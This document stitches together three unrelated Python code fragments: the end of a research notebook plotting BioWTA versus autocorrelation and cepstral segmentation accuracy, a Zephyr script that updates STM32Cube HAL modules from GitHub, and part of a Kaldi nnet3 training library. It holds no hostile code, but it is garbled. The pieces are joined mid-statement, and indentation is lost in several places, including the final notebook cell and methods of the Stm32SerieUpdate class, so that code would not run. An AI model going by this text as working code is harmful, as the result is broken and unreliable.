        f"{''.join(str(_) for _ in key)}: median={crt_median:.4f}, "
        f"5%={crt_quantile:.4f}, "
        f"fraction>{int(100 * good_score)}%={crt_good:.4f}"
    )
# %%
# Augment each run's history with AR-coefficient reconstruction progress.
for key in tqdm(biowta_configurations, desc="biowta cfg, reconstruction progress"):
    calculate_ar_identification_progress(result_biowta_mods[key][1].history, dataset)
# %% [markdown]
# Find some "good" indices in the dataset: one that obtains an accuracy score close to a chosen threshold for "good-enough" (which we set to 85%); and one that has a similar score but also has small reconstruction error for the weights.
# %%
# The variant highlighted in the paper: soft + persistent ("enh. BioWTA").
result_biowta_chosen = result_biowta_mods[1, 1, 0]
# Trials whose accuracy is within +/-2% of the good-score threshold.
crt_mask = (result_biowta_chosen[1].trial_scores > 0.98 * good_score) & (
    result_biowta_chosen[1].trial_scores < 1.02 * good_score
)
crt_idxs = crt_mask.nonzero()[0]
# Final normalized weight-reconstruction error for each trial.
crt_errors_norm = np.asarray(
    [np.mean(_.weight_errors_normalized_[-1]) for _ in result_biowta_chosen[1].history]
)
# Among near-threshold trials: worst and best weight reconstruction.
good_biowta_idx = crt_idxs[np.argmax(crt_errors_norm[crt_mask])]
good_biowta_ident_idx = crt_idxs[np.argmin(crt_errors_norm[crt_mask])]
good_idxs = [good_biowta_ident_idx, good_biowta_idx]
# %%
result_biowta_chosen[1].trial_scores[good_idxs]
# %%
crt_errors_norm[good_idxs]
# %%
# Rolling-accuracy trace plots for every BioWTA variant, highlighting the
# two hand-picked trials from above.
for key in biowta_configurations:
    make_multi_trajectory_plot(
        result_biowta_mods[key][1],
        dataset,
        n_traces=25,
        highlight_idx=good_idxs,
        sliding_kws={"window_size": 5000, "overlap_fraction": 0.8},
        trace_kws={"alpha": 0.85, "lw": 0.75, "color": "gray"},
        rug_kws={"alpha": 0.3},
    )
# %% [markdown]
# ## Run learning and inference for autocorrelation and cepstral methods
# %%
t0 = time.time()
# Autocorrelation-based segmentation (NSM clustering on cross-correlations).
result_xcorr = hyper_score_ar(
    CrosscorrelationRegressor,
    dataset,
    metric,
    n_models=n_models,
    n_features=n_features,
    nsm_rate=rate_nsm,
    xcorr_rate=1 / streak_nsm,
    progress=tqdm,
    monitor=["r", "nsm.weights_", "xcorr.coef_"],
)
t1 = time.time()
print(
    f"Median accuracy score xcorr: {result_xcorr[0]:.2}. "
    f"(Took {t1 - t0:.2f} seconds.)"
)
# %%
t0 = time.time()
# Cepstral oracle: initialized at the ground-truth AR weights ("oracle_ar").
result_cepstral = hyper_score_ar(
    CepstralRegressor,
    dataset,
    metric,
    cepstral_order=order_cepstral,
    cepstral_kws={"rate": rate_cepstral},
    initial_weights="oracle_ar",
    progress=tqdm,
    monitor=["r"],
)
t1 = time.time()
print(
    f"Median accuracy score cepstral: {result_cepstral[0]:.2}. "
    f"(Took {t1 - t0:.2f} seconds.)"
)
# %% [markdown]
# ## Run BioWTA with weights fixed at ground-truth values
# %%
t0 = time.time()
# rate=0 freezes learning and initial_weights="oracle_ar" starts at the
# ground-truth AR coefficients, so this run is the enhanced-BioWTA oracle.
oracle_biowta = hyper_score_ar(
    BioWTARegressor,
    dataset,
    metric,
    n_models=n_models,
    n_features=n_features,
    rate=0,
    trans_mat=biowta_configurations[1, 1, 0]["trans_mat"],
    temperature=biowta_configurations[1, 1, 0]["temperature"],
    error_timescale=biowta_configurations[1, 1, 0]["error_timescale"],
    initial_weights="oracle_ar",
    progress=tqdm,
    monitor=["r", "prediction_"],
)
t1 = time.time()
print(
    f"Median accuracy score oracle BioWTA: {oracle_biowta[0]:.2}. "
    f"(Took {t1 - t0:.2f} seconds.)"
)
# %% [markdown]
# ## Make plots
# %%
# Enhanced BioWTA vs. its oracle counterpart.
fig, axs = make_accuracy_plot(
    result_biowta_chosen[1], oracle_biowta[1], dataset, good_idxs
)
axs[0, 2].set_xlabel("enh. BioWTA oracle")
axs[0, 2].set_ylabel("enh. BioWTA")
fig.savefig(
    os.path.join(fig_path, "rolling_accuracy_2x_ar3_100trials_biowta.png"), dpi=600
)
# %%
# Headline numbers for the text: fraction of good-accuracy runs and fraction
# converging within the step threshold.
crt_frac_good = np.mean(result_biowta_chosen[1].trial_scores > good_score)
print(
    f"Percentage of runs with BioWTA accuracies over {int(good_score * 100)}%: "
    f"{int(crt_frac_good * 100)}%."
)
crt_frac_fast = np.mean(
    np.asarray(result_biowta_chosen[1].convergence_times) <= threshold_steps
)
print(
    f"Percentage of runs with BioWTA convergence times under {threshold_steps}: "
    f"{int(crt_frac_fast * 100)}%."
)
# %%
# Autocorrelation method vs. the BioWTA oracle.
fig, axs = make_accuracy_plot(result_xcorr[1], oracle_biowta[1], dataset, good_idxs)
axs[0, 2].set_xlabel("enh. BioWTA oracle")
axs[0, 2].set_ylabel("autocorrelation")
fig.savefig(
    os.path.join(fig_path, "rolling_accuracy_2x_ar3_100trials_xcorr.png"), dpi=600
)
# %%
print(
    f"Percentage of runs with xcorr accuracies over {int(good_score * 100)}%: "
    f"{int(np.mean(result_xcorr[1].trial_scores > good_score) * 100)}%."
)
threshold_steps = 10_000
print(
    f"Percentage of runs with xcorr convergence times under {threshold_steps}: "
    f"{int(np.mean(np.asarray(result_xcorr[1].convergence_times) <= threshold_steps) * 100)}%."
)
threshold_steps_small = 1000
print(
    f"Percentage of runs with xcorr convergence times under {threshold_steps_small}: "
    f"{int(np.mean(np.asarray(result_xcorr[1].convergence_times) <= threshold_steps_small) * 100)}%."
)
# %%
# Cepstral oracle vs. the BioWTA oracle.
fig, axs = make_accuracy_plot(result_cepstral[1], oracle_biowta[1], dataset, good_idxs)
axs[0, 2].set_xlabel("enh. BioWTA oracle")
axs[0, 2].set_ylabel("cepstral oracle")
fig.savefig(
    os.path.join(fig_path, "rolling_accuracy_2x_ar3_100trials_cepstral.png"), dpi=600
)
# %%
print(
    f"Percentage of runs with cepstral accuracies over {int(good_score * 100)}%: "
    f"{int(np.mean(result_cepstral[1].trial_scores > good_score) * 100)}%."
)
threshold_steps = 10_000
print(
    f"Percentage of runs with cepstral convergence times under {threshold_steps}: "
    f"{int(np.mean(np.asarray(result_cepstral[1].convergence_times) <= threshold_steps) * 100)}%."
)
threshold_steps_small = 1000
print(
    f"Percentage of runs with cepstral convergence times under {threshold_steps_small}: "
    f"{int(np.mean(np.asarray(result_cepstral[1].convergence_times) <= threshold_steps_small) * 100)}%."
)
# %% [markdown]
# # Explain variability in BioWTA accuracy scores, show effect of algorithm improvements
# %%
# Analytic prediction of plain-BioWTA accuracy from each signal's AR pair.
predicted_plain_scores = [
    predict_plain_score(crt_sig.armas, sigma_ratio=1.0 / crt_sig.scale)
    for crt_sig in tqdm(dataset)
]
# %%
# Cartoon explaining where BioWTA segmentation errors come from: the two
# models' predictive distributions overlap, so samples falling on the wrong
# side of the decision boundary get misassigned.
with plt.style.context(paper_style):
    with FigureManager(
        1,
        2,
        gridspec_kw={"width_ratios": (12, 2)},
        despine_kws={"offset": 5},
        figsize=(2.8, 1.5),
        constrained_layout=True,
    ) as (fig, axs):
        # Toy setup: two models predicting -sigma and +sigma; the decision
        # boundary sits halfway between them.
        crt_sigma = 0.5
        crt_pred1 = -crt_sigma
        crt_pred2 = crt_sigma
        crt_thresh = 0.5 * (crt_pred1 + crt_pred2)
        crt_samples = [-0.3, 1.0, -0.7, 0.4, -1.3, -0.6, 0.3, -0.2, -0.5]
        crt_n = len(crt_samples)
        crt_usage = np.zeros(crt_n + 1, dtype=int)
        axs[0].plot(crt_samples, ".-", c="gray")
        # axs[0].axhline(0, ls=":", c="gray")
        # Box marking the next time step, whose pdf is drawn in the right panel.
        crt_box = [[crt_n - 0.4, crt_n + 0.4], [-1.4, 1.4]]
        axs[0].plot(
            crt_box[0] + crt_box[0][::-1] + [crt_box[0][0]],
            [crt_box[1][0]] + crt_box[1] + crt_box[1][::-1],
            "k-",
        )
        crt_p_range = (-1.5, 1.5)
        axs[0].set_ylim(*crt_p_range)
        axs[0].set_xlabel("time step")
        axs[0].set_ylabel("signal $y(t)$")
        axs[0].set_xticks([0, len(crt_samples)])
        axs[0].set_xticklabels([0, "$\\tau$"])
        show_latent(crt_usage, ax=axs[0])
        axs[0].annotate(
            "ground truth: model 1",
            (0.5, axs[0].get_ylim()[1] - 0.03),
            color="w",
            verticalalignment="top",
            fontsize=6,
            fontweight="bold",
        )
        # Fan of lines visualizing model 1's predictive density at the boxed
        # time step; opacity tracks the density.
        crt_ps = np.linspace(*crt_p_range, 100)
        crt_dist = (
            1
            / np.sqrt(2 * np.pi * crt_sigma ** 2)
            * np.exp(-0.5 * ((crt_ps - crt_pred1) / crt_sigma) ** 2)
        )
        for crt_y, crt_p in zip(crt_ps, crt_dist):
            if crt_y < crt_box[1][0] or crt_y >= crt_box[1][1]:
                continue
            axs[0].plot(
                [crt_n - 1, crt_box[0][0]],
                [crt_samples[-1], crt_y],
                c="gray",
                alpha=0.5 * crt_p,
            )
            axs[0].plot(
                [crt_box[0][0] + 0.01, crt_box[0][1] - 0.01],
                [crt_y, crt_y],
                c="gray",
                alpha=0.5 * crt_p,
            )
        # Right panel: the same pdf split at the decision boundary; the part
        # beyond the boundary (misassigned mass) is drawn in the error color.
        crt_col1 = "C0"
        crt_col2 = "C1"
        crt_col_err1 = "C1"
        crt_col_err2 = "C4"
        crt_x0 = 1.00
        axs[1].annotate(
            "model 1",
            xy=(crt_x0, crt_pred1),
            verticalalignment="center",
            # fontweight="bold",
            fontsize=7,
            color=crt_col1,
        )
        axs[1].annotate(
            "model 2",
            xy=(crt_x0, crt_pred2),
            verticalalignment="center",
            # fontweight="bold",
            fontsize=7,
            color=crt_col2,
        )
        axs[1].annotate(
            "decision\nboundary",
            xy=(crt_x0, crt_thresh),
            verticalalignment="center",
            # fontweight="bold",
            fontsize=7,
            color="gray",
            linespacing=0.8,
        )
        crt_cut_idx = np.argmin(np.abs(crt_ps - crt_thresh))
        axs[1].plot(
            crt_dist[: crt_cut_idx + 1],
            crt_ps[: crt_cut_idx + 1],
            c=crt_col1,
            alpha=0.8,
        )
        axs[1].plot(
            crt_dist[crt_cut_idx:], crt_ps[crt_cut_idx:], c=crt_col_err1, alpha=0.8
        )
        axs[1].plot(-crt_dist, crt_ps, c="gray", alpha=0.8)
        axs[1].fill_betweenx(
            crt_ps, -crt_dist, color="gray", alpha=0.3,
        )
        axs[1].fill_betweenx(
            crt_ps[: crt_cut_idx + 1],
            crt_dist[: crt_cut_idx + 1],
            color=crt_col1,
            alpha=0.3,
        )
        axs[1].fill_betweenx(
            crt_ps[crt_cut_idx:], crt_dist[crt_cut_idx:], color=crt_col_err1, alpha=0.3
        )
        axs[1].axhline(crt_pred1, c=crt_col1, ls=":")
        axs[1].axhline(crt_pred2, c=crt_col2, ls=":")
        axs[1].axhline(crt_thresh, c="gray", ls="--")
        axs[1].set_xlim(-1.0, crt_x0)
        axs[1].set_ylim(*crt_p_range)
        axs[1].set_xlabel("pdf $y(t=\\tau)$")
        axs[1].set_yticks([])
        axs[1].set_xticks([0])
        axs[1].set_xticklabels([" "])
        sns.despine(left=True, ax=axs[1])
    fig.savefig(
        os.path.join(fig_path, "explanation_for_biowta_segmentation_errors.pdf"),
        transparent=True,
    )
# %%
# Scatter of measured vs. analytically predicted accuracy for plain and
# enhanced BioWTA; the dashed diagonal marks perfect prediction.
with plt.style.context(paper_style):
    with FigureManager(
        1, 2, despine_kws={"offset": 5}, figsize=(3, 1.5), constrained_layout=True
    ) as (fig, axs):
        axs[0].plot([0.5, 1], [0.5, 1], "--", c="gray", zorder=-15)
        axs[0].scatter(
            predicted_plain_scores,
            result_biowta_mods[0, 0, 0][1].trial_scores,
            s=6,
            c="C2",
            alpha=0.5,
        )
        axs[0].set_aspect(1)
        axs[0].set_xlabel("expectation")
        axs[0].set_ylabel("plain BioWTA")
        axs[0].set_xlim([0.5, 1])
        axs[0].set_ylim([0.5, 1])
        axs[1].plot([0.5, 1], [0.5, 1], "--", c="gray", zorder=-15)
        axs[1].scatter(
            predicted_plain_scores,
            result_biowta_chosen[1].trial_scores,
            s=6,
            c="C3",
            alpha=0.5,
        )
        axs[1].set_aspect(1)
        axs[1].set_xlabel("expectation")
        axs[1].set_ylabel("enh. BioWTA")
        axs[1].set_xlim([0.5, 1])
        axs[1].set_ylim([0.5, 1])
    fig.savefig(
        os.path.join(fig_path, "plain_vs_enh_biowta.pdf"), transparent=True,
    )
# %%
with plt.style.context(paper_style):
with FigureManager(despine_kws={"offset": 5}, figsize=(5.76, 1.5)) as (fig, ax):
crt_x_values = []
crt_y_values = []
mod_sel = {
"no enhancements\n(plain BioWTA)": (0, 0, 0),
"persistent": (0, 1, 0),
"soft\npersistent\n(enh. BioWTA)": (1, 1, 0),
"soft\npersistent\naveraging": (1, 1, 1),
"averaging\nonly": (0, 0, 1),
}
for i, (crt_name, crt_mod) in enumerate(mod_sel.items()):
crt_scores = result_biowta_mods[crt_mod][1].trial_scores
crt_y_values.extend(crt_scores)
crt_x_values.extend([i] * len(crt_scores))
| |
# Repository: koson/hal_stm32
#!/usr/bin/python
"""
SPDX-License-Identifier: Apache-2.0
Copyright (c) 2019 STMicroelectronics.
This script define Stm32SerieUpdate class
to be used by update_stm32_package.py
"""
import os
import stat
import shutil
import subprocess
import re
from pathlib import Path
import logging
STM32_CUBE_REPO_BASE = "https://github.com/STMicroelectronics/STM32Cube"
logging.basicConfig(level=logging.INFO)
def remove_readonly(func, path, _):
    """shutil.rmtree error hook: clear the read-only bit, then retry *func*."""
    writable = stat.S_IWRITE
    os.chmod(path, writable)
    func(path)
def os_cmd(cmd, cwd=None, shell=False):
    """Run *cmd* through ``subprocess.check_call`` after logging it.

    Args:
        cmd: command to execute (string or argument sequence).
        cwd: directory in which to run the command.
        shell: whether the shell should interpret the command.

    Returns:
        The command's return code (``check_call`` raises
        ``CalledProcessError`` on a non-zero exit, so this is always 0).
    """
    logging.info(cmd)
    returncode = subprocess.check_call(cmd, cwd=cwd, shell=shell)
    return returncode
class Stm32SerieUpdate:
"""class Stm32SerieUpdate"""
    def __init__(self, stm32_serie, stm32cube_repo_path, force, noclean):
        """Class Stm32SerieUpdate constructor

        Derives all serie-specific names and paths, creates (or wipes and
        recreates) the temporary working directory, and initializes the
        version bookkeeping attributes.

        Args:
            stm32_serie: stm32 serie ex:stm32f3xx
            stm32cube_repo_path: directory path where to fetch github repo
            force: boolean to force or not git commit after applying update
            noclean: boolean to clean or not github repo after update done
        Raises:
            ValueError: If stm32 serie is not recognised.
            FileNotFoundError: If Zphyr STM32 cube path is not found
        """
        if not stm32_serie.startswith("stm32"):
            raise ValueError(
                "Error: Unknown stm32 serie: "
                + stm32_serie
                + ". Must start with 'stm32'"
            )
        # Set serie variables
        self.stm32_serie = stm32_serie
        self.stm32_seriexx = stm32_serie + "xx"  # ex:stm32f3xx
        self.stm32_serie_upper = stm32_serie.upper()  # ex:STM32F3
        self.stm32_seriexx_upper = self.stm32_serie_upper + "xx"  # ex:STM32F3xx
        self.serie = self.stm32_serie_upper[5:]
        self.force = force
        self.noclean = noclean
        # ##### 3 root directories to work with ########
        # 1: STM32Cube repo Default $HOME/STM32Cube_repo
        # 2 : zephyr stm32 path : ex: .../zephyr_project/module/hal/stm32
        # 3: Temporary directory to construct the update
        # (within STM32Cube repo dir)
        self.stm32cube_repo_path = stm32cube_repo_path
        if not self.stm32cube_repo_path.exists():
            self.stm32cube_repo_path.mkdir()
        # NOTE(review): assumes the ZEPHYR_BASE environment variable is set;
        # Path(None) would raise a TypeError otherwise -- confirm callers
        # guarantee this.
        self.zephyr_hal_stm32_path = (
            Path(os.getenv("ZEPHYR_BASE")).absolute()
            / ".."
            / "modules"
            / "hal"
            / "stm32"
        )
        if not self.zephyr_hal_stm32_path.exists():
            raise FileNotFoundError("Error: cannot find zephyr project")
        # Scratch area, recreated from empty on every run.
        self.stm32cube_temp = self.stm32cube_repo_path / "temp_stm32xx_update"
        if self.stm32cube_temp.exists():
            shutil.rmtree(str(self.stm32cube_temp), onerror=remove_readonly)
        self.stm32cube_temp.mkdir()
        # subdir specific to a stm32 serie
        self.stm32cube_serie_path = self.stm32cube_repo_path / Path(
            "STM32Cube" + self.serie
        )
        self.zephyr_module_serie_path = (
            self.zephyr_hal_stm32_path / "stm32cube" / self.stm32_seriexx
        )
        self.stm32cube_temp_serie = (
            self.stm32cube_temp / "stm32cube" / self.stm32_seriexx
        )
        # The temp dir is wiped a second time here so only the serie subtree
        # exists afterwards.
        shutil.rmtree(str(self.stm32cube_temp), onerror=remove_readonly)
        self.stm32cube_temp_serie.mkdir(parents=True)
        self.readme_file_path = self.zephyr_module_serie_path / "README"
        # Version bookkeeping, filled by clone_cube_repo() and
        # get_zephyr_current_version().
        self.version_tag = []
        self.current_version = ""
        self.latest_version = ""
        self.latest_commit = ""
def clone_cube_repo(self):
"""Clone or fetch a stm32 serie repo"""
# check whether master branch exist, otherwise use main branch
master_branch_exist = subprocess.check_output(
"git ls-remote --heads origin master", cwd=self.stm32cube_serie_path
).decode("utf-8")
if master_branch_exist:
branch = "master"
else:
branch = "main"
logging.info("Branch used:" + branch)
if self.stm32cube_serie_path.exists():
logging.info("fetching repo " + str(self.stm32cube_serie_path))
# if already exists, then just clean and fetch
os_cmd(("git", "clean", "-fdx"), cwd=self.stm32cube_serie_path)
os_cmd(("git", "fetch"), cwd=self.stm32cube_serie_path)
os_cmd(
("git", "reset", "--hard", branch),
cwd=self.stm32cube_serie_path,
)
else:
os_cmd(
("git", "clone", STM32_CUBE_REPO_BASE + self.serie + ".git"),
cwd=self.stm32cube_repo_path,
)
# get the latest version of cube,
# with the most recent one created being the last entry.
os_cmd(("git", "checkout", branch), cwd=self.stm32cube_serie_path)
self.version_tag = subprocess.check_output(
("git", "tag", "-l"),
cwd=self.stm32cube_serie_path
).splitlines()
self.version_tag = [x.decode("utf-8") for x in self.version_tag]
# Set latest version
self.latest_version = self.version_tag[-1]
def get_zephyr_current_version(self):
"""Look for current zephyr hal version
Returns:
return previous zephyr cube version.
Raises:
ValueError: If version is not found.
"""
with open(str(self.readme_file_path), "r") as f:
for line in f:
# pattern : "version " follow by optional "v",
# followed by x.y or x.y.z x,y,z may represent several digits
# ex: 'version v1.8.9', 'version 10.20.25'
pattern = r".*version v?(\d+\.\d+\.?\d*).*$"
if re.match(pattern, line):
previous_version = re.sub(pattern, r"\1", line).rstrip("\n")
break
# Match previous version and list of existing tags
# which could be vx.y or x.y
pos_version = [
i for i, a in enumerate(self.version_tag) if previous_version in a
]
if pos_version:
# return previous zephyr version
return self.version_tag[pos_version[0]]
else:
self.clean_files()
raise ValueError(
"Error: cannot find version "
+ previous_version
+ " in STM32Cube_repo"
)
    def extract_source(self):
        """Extract sources and includes files from STM32Cube repo
        and copy them in temporary directory

        Copies CMSIS device headers and startup templates into
        ``<temp>/soc``, and HAL/LL driver headers and sources into
        ``<temp>/drivers/{include,src}``, renaming the shipped
        ``*_hal_conf_template.h`` to ``*_hal_conf.h`` on the way.
        """
        # for CMSIS files
        temp_cmsis_soc_path = self.stm32cube_temp_serie / "soc"
        Path.mkdir(temp_cmsis_soc_path, parents=True)
        stm32cube_cmsis_include_path = (
            self.stm32cube_serie_path
            / "Drivers"
            / "CMSIS"
            / "Device"
            / "ST"
            / self.stm32_seriexx_upper
            / "Include"
        )
        # NOTE(review): relies on the external `cp` command, so this script
        # is POSIX-only.
        os_cmd(
            (
                "cp",
                "-r",
                str(stm32cube_cmsis_include_path),
                str(temp_cmsis_soc_path),
            )
        )
        stm32cube_cmsis_templates_path = (
            self.stm32cube_serie_path
            / "Drivers"
            / "CMSIS"
            / "Device"
            / "ST"
            / self.stm32_seriexx_upper
            / "Source"
            / "Templates"
        )
        # Copy only plain files, skipping the toolchain subdirectories.
        for repo_file in stm32cube_cmsis_templates_path.iterdir():
            repo_src = stm32cube_cmsis_templates_path / repo_file
            if repo_src.is_file():
                shutil.copy(str(repo_src), str(temp_cmsis_soc_path))
        # for hal and ll drivers
        temp_drivers_include_path = (
            self.stm32cube_temp_serie / "drivers" / "include"
        )
        temp_drivers_include_path.parent.mkdir(parents=True)
        stm32cube_driver_inc = (
            self.stm32cube_serie_path
            / "Drivers"
            / Path(self.stm32_seriexx_upper + "_HAL_Driver")
            / "Inc"
        )
        os_cmd(
            (
                "cp",
                "-r",
                str(stm32cube_driver_inc),
                str(temp_drivers_include_path),
            )
        )
        # except for _hal_conf_template.h
        hal_conf_template = [
            f
            for f in temp_drivers_include_path.iterdir()
            if "hal_conf_template.h" in f.name
        ][0]
        hal_conf_template_fullpath = (
            temp_drivers_include_path / hal_conf_template
        )
        if hal_conf_template_fullpath.is_file():
            # Rename ..._hal_conf_template.h to ..._hal_conf.h, replacing any
            # existing file of that name.
            hal_conf_fullpath = Path(
                re.sub("_template", r"", str(hal_conf_template_fullpath))
            )
            if hal_conf_fullpath.exists():
                hal_conf_fullpath.unlink()
            hal_conf_template_fullpath.rename(hal_conf_fullpath)
        temp_drivers_src_path = self.stm32cube_temp_serie / "drivers" / "src"
        temp_drivers_src_path.mkdir()
        stm32cube_drivers_src_path = (
            self.stm32cube_serie_path
            / "Drivers"
            / Path(self.stm32_seriexx_upper + "_HAL_Driver")
            / "Src"
        )
        # shell=True so the glob expands and files (not the directory) are
        # copied.
        os_cmd(
            (
                "cp " +
                "-r " +
                str(stm32cube_drivers_src_path) + "/*.* " +
                str(temp_drivers_src_path)
            ),
            shell=True,
        )
    def build_from_current_cube_version(self):
        """Build a commit in temporary dir with STM32Cube version
        corresponding to zephyr current hal version
        """
        # reset the STM32Cube repo to this current version
        os_cmd(
            ("git", "reset", "--hard", self.current_version),
            cwd=self.stm32cube_serie_path,
        )
        # build the zephyr module from the stm32cube
        self.extract_source()
        logging.info(
            "Building module from STM32Cube_repo " + self.current_version
        )
        if not self.stm32cube_temp_serie.parent.exists():
            self.stm32cube_temp_serie.parent.mkdir(parents=True)
        # Commit the freshly extracted tree so later steps can diff against
        # it.
        os_cmd(
            ("git", "add", "-A", "stm32cube/" + self.stm32_seriexx + "/*"),
            cwd=self.stm32cube_temp,
        )
        os_cmd(
            ("git", "commit", "-am", '"module' + self.current_version + '"'),
            cwd=self.stm32cube_temp,
        )
    def build_patch_from_current_zephyr_version(self):
        """Build patch between zephyr current hal version and
        corresponding official STM32Cube version

        Produces ``module.patch`` (whole module) and, when present,
        ``hal_conf.patch`` (HAL configuration header only) in the temp dir.
        """
        # clean-up the module
        shutil.rmtree(str(self.stm32cube_temp_serie), onerror=remove_readonly)
        # populate the new repo with this current zephyr module
        os_cmd(
            (
                "cp",
                "-rf",
                str(self.zephyr_module_serie_path),
                str(self.stm32cube_temp_serie),
            )
        )
        # commit this current version module
        os_cmd(("git", "add", "*"), cwd=self.stm32cube_temp)
        os_cmd(("git", "commit", "-am", '"module"'), cwd=self.stm32cube_temp)
        # Remove trailing space
        os_cmd(
            ("git", "rebase", "--whitespace=fix", "HEAD~1"),
            cwd=self.stm32cube_temp,
        )
        # generate a patch for files and _hal.conf.h file in the module
        logging.info(
            "Building patch from " + self.current_version + " to current module"
        )
        os_cmd(
            "git diff --ignore-space-at-eol HEAD~1 >> module.patch",
            shell=True,
            cwd=self.stm32cube_temp,
        )
        os_cmd(("dos2unix", "module.patch"), cwd=self.stm32cube_temp)
        # Separate patch for the HAL configuration header, diffed against the
        # pre-rebase commit (HEAD@{1}); dropped again if it comes out empty.
        hal_conf = (
            self.stm32cube_temp_serie
            / "drivers"
            / "include"
            / Path(self.stm32_seriexx + "_hal_conf.h")
        )
        hal_conf_patch = self.stm32cube_temp / "hal_conf.patch"
        if hal_conf.exists():
            os_cmd(
                (
                    "git " +
                    "diff " +
                    "HEAD@{1} " +
                    "-- " +
                    str(hal_conf) +
                    " >> " +
                    str(hal_conf_patch)
                ),
                shell=True,
                cwd=self.stm32cube_temp,
            )
            if hal_conf_patch.stat().st_size == 0:
                hal_conf_patch.unlink()
            else:
                os_cmd(("dos2unix", str(hal_conf_patch)))
    def update_readme(self, make_version, make_commit):
        """Update README file

        Rewrites the module README in place, substituting the new STM32Cube
        version, commit and URL while keeping all other content.

        Args:
            make_version: latest STM32Cube version.
            make_commit: Commit corresponding to latest STM32Cube version.
        """
        see_release_note = True
        readme_path = self.stm32cube_temp_serie / "README"
        with readme_path.open(mode="r") as readme_prev:
            lines = (x for x in readme_prev.read().splitlines())
        readme_path.unlink()
        # Write README from previous one if exists
        with open(str(readme_path), "w") as readme_file:
            for LineItem in lines:
                # change version nb
                if "status" in LineItem.lower():
                    readme_file.write("Status:\n")
                    readme_file.write("   version {0}\n".format(make_version))
                    next(lines)  # skip next line
                elif "commit" in LineItem.lower():
                    readme_file.write("Commit:\n")
                    readme_file.write("   {0}".format(make_commit))
                    next(lines)  # skip next line
                elif "URL" in LineItem.upper():
                    readme_file.write("URL:\n")
                    readme_file.write(
                        "   https://github.com/STMicroelectronics/"
                        + "STM32Cube{0}\n".format(self.serie)
                    )
                    next(lines)  # skip next line
                # change patch list with a link to the release_note.html
                elif "Patch List" in LineItem:
                    readme_file.write("Patch List:\n")
                    readme_file.write(
                        "--> please check that the following list "
                        + "is still valid:\n"
                    )
                else:
                    if "See release_note.html from STM32Cube" in LineItem:
                        see_release_note = False
                    readme_file.write("{0}\n".format(LineItem))
            # at the very end of the file :
            if see_release_note:
                readme_file.write("\n   See release_note.html from STM32Cube\n")
            readme_file.flush()
        os_cmd(("dos2unix", str(readme_path)))
def copy_release_note(self):
"""Copy release_note.html file from STM32Cube to zephyr"""
release_note_src = self.stm32cube_serie_path / "Release_Notes.html"
release_note_dst = self.zephyr_module_serie_path / "release_note.html"
if release_note_dst.exists():
release_note_dst.unlink()
if release_note_src.exists:
release_note_src.rename(release_note_dst)
os_cmd(("dos2unix", str(release_note_dst)))
def update_cmakelist(self):
"""Update CMakeLists.txt file"""
cmakelists_path = self.stm32cube_temp_serie / "CMakeLists.txt"
if cmakelists_path.exists():
# build new CMakeLists.txt
with cmakelists_path.open("r") as cmakelists_old:
# this line is the copyright line
first_line = cmakelists_old.readline()
cmakelists_path.unlink()
else:
first_line = ""
logging.info("Create a new CMakeLists.txt file")
with cmakelists_path.open("w") as cmakelists_new:
if first_line:
cmakelists_new.write(first_line)
cmakelists_new.write("# Copyright (c) 2020 STMicroelectronics\n")
cmakelists_new.write("#\n")
cmakelists_new.write("# SPDX-License-Identifier: Apache-2.0\n")
cmakelists_new.write("\n")
src_path = self.stm32cube_temp_serie / "drivers" / "src"
source_files = list(src_path.iterdir())
source_files.sort()
cmakelists_new.write(
"zephyr_library_sources(soc/system_"
+ self.stm32_seriexx
+ | |
context ({0},{1}) '
'versus expected ({2},{3})'.format(
egs_left_context, egs_right_context,
left_context, right_context))
# the condition on the initial/final context is an equality condition,
# not an inequality condition, as there is no mechanism to 'correct' the
# context (by subtracting context) while copying the egs, like there is
# for the regular left-right context. If the user is determined to use
# previously dumped egs, they may be able to slightly adjust the
# --egs.chunk-left-context-initial and --egs.chunk-right-context-final
# options to make things matched up. [note: the model l/r context gets
# added in, so you have to correct for changes in that.]
if (egs_left_context_initial != left_context_initial or
egs_right_context_final != right_context_final):
raise Exception('The egs have incorrect initial/final (l,r) context '
'({0},{1}) versus expected ({2},{3}). See code from '
'where this exception was raised for more info'.format(
egs_left_context_initial, egs_right_context_final,
left_context_initial, right_context_final))
frames_per_eg_str = open('{0}/info/frames_per_eg'.format(
egs_dir)).readline().rstrip()
if not validate_chunk_width(frames_per_eg_str):
raise Exception("Invalid frames_per_eg in directory {0}/info".format(
egs_dir))
num_archives = int(open('{0}/info/num_archives'.format(
egs_dir)).readline())
return [egs_left_context, egs_right_context,
frames_per_eg_str, num_archives]
except (IOError, ValueError):
logger.error("The egs dir {0} has missing or "
"malformed files.".format(egs_dir))
raise
def compute_presoftmax_prior_scale(dir, alidir, num_jobs, run_opts,
                                   presoftmax_prior_scale_power=-0.25):
    """Accumulate pdf occupation counts from the alignments in *alidir*,
    smooth and scale them, and write the resulting presoftmax prior-scale
    vector to ``<dir>/presoftmax_prior_scale.vec`` (symlinked from the
    configs directory).

    Note: the parameter name ``dir`` shadows the builtin; it is kept for
    interface compatibility with the calling scripts.
    """
    # getting the raw pdf count
    common_lib.run_job(
        """{command} JOB=1:{num_jobs} {dir}/log/acc_pdf.JOB.log \
                ali-to-post "ark:gunzip -c {alidir}/ali.JOB.gz|" ark:- \| \
                post-to-tacc --per-pdf=true  {alidir}/final.mdl ark:- \
                {dir}/pdf_counts.JOB""".format(command=run_opts.command,
                                               num_jobs=num_jobs,
                                               dir=dir,
                                               alidir=alidir))
    common_lib.run_job(
        """{command} {dir}/log/sum_pdf_counts.log \
                vector-sum --binary=false {dir}/pdf_counts.* {dir}/pdf_counts \
        """.format(command=run_opts.command, dir=dir))
    # Remove the per-job accumulators now that they have been summed.
    for file in glob.glob('{0}/pdf_counts.*'.format(dir)):
        os.remove(file)
    pdf_counts = common_lib.read_kaldi_matrix('{0}/pdf_counts'.format(dir))[0]
    scaled_counts = smooth_presoftmax_prior_scale_vector(
        pdf_counts,
        presoftmax_prior_scale_power=presoftmax_prior_scale_power,
        smooth=0.01)
    output_file = "{0}/presoftmax_prior_scale.vec".format(dir)
    common_lib.write_kaldi_matrix(output_file, [scaled_counts])
    common_lib.force_symlink("../presoftmax_prior_scale.vec",
                             "{0}/configs/presoftmax_prior_scale.vec".format(
                                 dir))
def smooth_presoftmax_prior_scale_vector(pdf_counts,
                                         presoftmax_prior_scale_power=-0.25,
                                         smooth=0.01):
    """Compute per-pdf presoftmax prior scales from raw pdf counts.

    Each count is smoothed by ``smooth`` times the average count, raised to
    ``presoftmax_prior_scale_power``, and the vector is normalized so that
    its mean is 1.0.

    Args:
